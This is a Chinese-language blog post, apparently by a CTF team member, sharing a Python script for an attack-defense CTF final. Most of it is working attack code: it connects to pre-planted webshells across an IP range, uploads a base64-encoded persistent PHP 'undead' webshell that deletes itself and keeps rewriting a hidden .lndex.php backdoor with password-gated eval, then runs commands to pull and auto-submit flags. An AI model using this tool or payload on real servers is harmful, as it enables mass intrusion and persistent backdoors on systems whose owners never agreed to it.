前几天祥云杯决赛,看到学弟们要跑好几个脚本,还得手动提交flag,浪费大量时间,以至于没有足够的时间来挖掘漏洞。所以搞了个脚本来简化一下操作。

注:本脚本是利用预留后门只起到辅助作用,不要过分依赖。掌握技术,挖掘漏洞才是最重要的。

0x00 脚本功能

  • 利用预留后门批量上传不死马
  • 自动激活不死马
  • 根据设置的每轮比赛时间,自动获取flag并自动提交

0x01 脚本使用

在物理机上用python3跑就行

注:自动提交flag需在脚本里设置对应的post参数,不同比赛提交方式不一样,大家自行修改。

0x02 脚本代码

# -*- coding: utf-8 -*-
# SmoothAttack V1.0
# Author: 7i4n2h3n9
# Team: Polar Day Cyberspace Security LAB

import time
import requests
import webbrowser

# Starting Option
def welmemu():
    r_t = input('Please input the round time(min):')
    i_l = input('Please input the ip segment(eg:192.169.10.2-192.169.10.40):')
    s_d = input('Please input the shell dir(eg:/upload/1.php):')
    h_p = input('Please input the port of http server:')
    s_p = input('Please input the password of webshell:')
    t_k = input('Please input the token:')
    return r_t,i_l,s_d,h_p,s_p,t_k

def dir_re(shell_dir):
    s_dd = shell_dir.split('/')
    s_d_c = len(s_dd)
    busi_dir = shell_dir.replace(s_dd[s_d_c - 1],'jjnb.php')
    return busi_dir

#Ip Analysis
def ipAnalysis(ipl):
    ip_b = []
    ip_ta = ipl.split('-')
    ip_1 = ip_ta[0].split('.')
    ip_2 = ip_ta[1].split('.')
    ip_f = str(ip_1[0]) + '.' + str(ip_1[1]) + '.' + str(ip_1[2])
    for i in range(int(ip_1[3]),int(ip_2[3]) + 1):
        ip_tb = ip_f + '.' + str(i)
        ip_b.append(ip_tb)
    return ip_b

# Upload BuSi Webshell
def upWebshell(ip, port, passwd, shell, bs_dir):
    suc_ipl = []
    # The md5 pass of busiwebshell is polarnight, post pass is jjnb
    pay = "file_put_contents('./jjnb.php',base64_decode('PD9waHAgIA0KICAgIHNldF90aW1lX2xpbWl0KDApOyAgDQogICAgaWdub3JlX3VzZXJfYWJvcnQoMSk7ICANCiAgICB1bmxpbmsoX19GSUxFX18pOyAgDQogICAgd2hpbGUoMSl7ICANCiAgICAgICAgZmlsZV9wdXRfY29udGVudHMoJy5sbmRleC5waHAnLCc8P3BocCBpZihtZDUoJF9HRVRbInBhc3MiXSk9PSJiMGQyOWQ4NTIyZWNiNGU2YTE1YTFiMGMwNmJjZDNkOSIpe0BldmFsKCRfUE9TVFtqam5iXSk7fSA/PicpOyAgDQogICAgICAgIHNsZWVwKDApOyAgDQogICAgfQ0KPz4'));"
    pay1 = "system('find /var/www/html -name .lndex.php');"

    for j in ip:
        url = 'http://' + j
        r = conWebshell(url, shell, passwd, port, pay)
        bsd = url + bs_dir
        try:
            webbrowser.open(bsd)
            time.sleep(1)
        except:
            pass
        r1 = conWebshell(url, shell, passwd, port, pay1)
        if 'lndex' in r1.text:
            suc_ipl.append(j)
    return suc_ipl

# Connecting Webshell
def conWebshell(url, shell, passwd, port, pay):
    payload = {
        passwd:pay
    }
    url1 = url + ':' + port + shell
    response = requests.post(url1, payload)
    return response

def get_flag(ip, port, shell, passwd):
    flag = []
    g_flag_pay = "system('getflag');"

    for p in ip:
        url = 'http://' + p
        r = conWebshell(url, shell, passwd, port, g_flag_pay)
        flag.append(r.text)
    return flag

def sub_flag(r_time, ip, port, shell, passwd, token):
    #Set submit flag url
    f_url = 'http://192.168.0.1'
    #Set token
    while True:
        for q in ip:
            flag_tmp = get_flag(q, port, shell, passwd)
            s_f_pay = {
                'flag':flag_tmp,
                'token':token
            }
            r = requests.post(f_url,s_f_pay)
            print(r.text)
        time.sleep(r_time * 60)

if __name__ == '__main__' :
    round_time, ip_list, shell_dir, http_port, shell_pass, token = welmemu()

    busi_dir = dir_re(shell_dir)
    busi_passwd = 'jjnb'
    print(busi_dir)

    ip_seg = ipAnalysis(ip_list)
    #print(ip_seg)

    succe_iplist = upWebshell(ip_seg, http_port, shell_pass, shell_dir, busi_dir)
    print(succe_iplist)

    sub_flag(round_time, succe_iplist, http_port, busi_dir, busi_passwd, token)